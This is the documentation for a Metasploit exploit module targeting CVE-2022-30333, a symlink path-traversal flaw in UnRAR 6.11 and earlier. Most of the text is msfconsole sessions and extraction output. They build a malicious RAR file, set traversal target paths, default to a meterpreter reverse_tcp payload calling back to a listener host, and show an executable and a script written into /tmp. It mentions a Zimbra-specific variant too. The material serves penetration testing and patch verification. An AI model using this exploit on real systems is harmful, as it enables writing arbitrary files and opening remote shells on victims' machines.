## Vulnerable Application

This module exploits a symlink-based path traversal vulnerability in UnRAR 6.11 and earlier (open source version 6.1.6 and earlier). You can get the vulnerable versions here:

* [Vulnerable unRAR version](https://www.rarlab.com/rar/rarlinux-x64-611.tar.gz)
* [Github commit](https://github.com/pmachapman/unrar/commit/22b52431a0581ab5d687747b65662f825ec03946)

This module creates a generic RAR file containing whatever `PAYLOAD` the user configured.

## Verification Steps

To generate the .rar file:

```
msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set RHOSTS 10.0.0.154
RHOSTS => 10.0.0.154
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../tmp/docstest.txt
TARGET_PATH => ../../../../../../tmp/docstest.txt
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit

[*] Target filename: ../../../../../../tmp/docstest.txt
[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
```

Then, with a vulnerable versions of UnRAR (see the link above), extract it:

```
ron@fedora ~/shared/analysis/zimbra-unrar/rar $ ./unrar x -o+ ~/.msf4/local/payload.rar

UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal

Extracting from /home/ron/.msf4/local/payload.rar

Extracting  hhgdzigwkgv                                               OK 
Extracting  hhgdzigwkgv                                               OK 
All OK
ron@fedora ~/shared/analysis/zimbra-unrar/rar $ ls -l hhgdzigwkgv 
lrwxrwxrwx. 1 ron games 34 Jul 27 13:04 hhgdzigwkgv -> ../../../../../../tmp/docstest.txt

ron@fedora ~/shared/analysis/zimbra-unrar/rar $ file /tmp/docstest.txt
/tmp/docstest.txt: data
```

## Options

### `FILENAME`

The filename to generate, typically it's `payload.rar` and that works fine.

### `TARGET_PATH`

The path, including traversal characters (`../`) and the filename. The slashes' direction doesn't matter, that gets fixed in the module.

### `SYMLINK_FILENAME`

If set, use a specific filename for the symlink inside the RAR file - default (random) is almost always best.

### `CUSTOM_PAYLOAD`

If set, instead of encoding the configured payload, encode data from the given filename.

## Scenarios

This is a pretty generic exploit that can be used against any software with a bad version of UnRAR.

We also built a specific exploit for Zimbra - `exploit/linux/http/zimbra_unrar_cve_2022_30333`.

### Built-in payload

```
msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../../../tmp/evil.bin
TARGET_PATH => ../../../../../../../../tmp/evil.bin
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit

[*] Target filename: ../../../../../../../../tmp/evil.bin
[*] Encoding configured payload
[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
```

Then:

```
ron@fedora ~/.msf4/local $ ~/tools/unrar/unrar x -o+ ./payload.rar

UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal


Extracting from ./payload.rar

Extracting  xkmcxqotn                                                 OK 
Extracting  xkmcxqotn                                                 OK 
All OK
ron@fedora ~/.msf4/local $ file /tmp/evil.bin
/tmp/evil.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
```

### Custom payload

```
msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../../../tmp/evil.sh
TARGET_PATH => ../../../../../../../../tmp/evil.sh
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > echo -ne "#!/bin/bash\nwhoami\n" > /tmp/test.sh
[*] exec: echo -ne "#!/bin/bash\nwhoami\n" > /tmp/test.sh
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set CUSTOM_PAYLOAD /tmp/test.sh
CUSTOM_PAYLOAD => /tmp/test.sh
```

Then:

```
ron@fedora ~/.msf4/local $ ~/tools/unrar/unrar x -o+ ./payload.rar

UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal


Extracting from ./payload.rar

Extracting  jwbhkf                                                    OK 
Extracting  jwbhkf                                                    OK 
All OK
ron@fedora ~/.msf4/local $ bash /tmp/evil.sh
ron
/tmp/evil.sh: line 4: $'\177P\336': command not found
[...]
```

(The errors at the bottom are because we append random junk to the end for padding)


